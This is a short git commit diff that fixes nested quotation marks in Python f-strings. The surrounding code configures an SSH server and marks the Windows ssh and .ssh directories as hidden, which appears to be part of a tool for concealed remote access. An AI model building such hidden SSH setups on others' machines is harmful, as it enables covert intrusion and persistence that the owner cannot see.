fix: nested qoutation error
This commit is contained in:
parent
ce03247fdc
commit
56ec51e9f8
|
|
@ -7,8 +7,8 @@ def main():
|
|||
raise ValueError
|
||||
|
||||
setup.configure_sshd()
|
||||
hide.set_hidden(f"{os.environ["PROGRAMDATA"]}/ssh")
|
||||
hide.set_hidden(f"{os.environ["USERPROFILE"]}/.ssh")
|
||||
hide.set_hidden(f"{os.environ['PROGRAMDATA']}/ssh")
|
||||
hide.set_hidden(f"{os.environ['USERPROFILE']}/.ssh")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Loading…
Reference in New Issue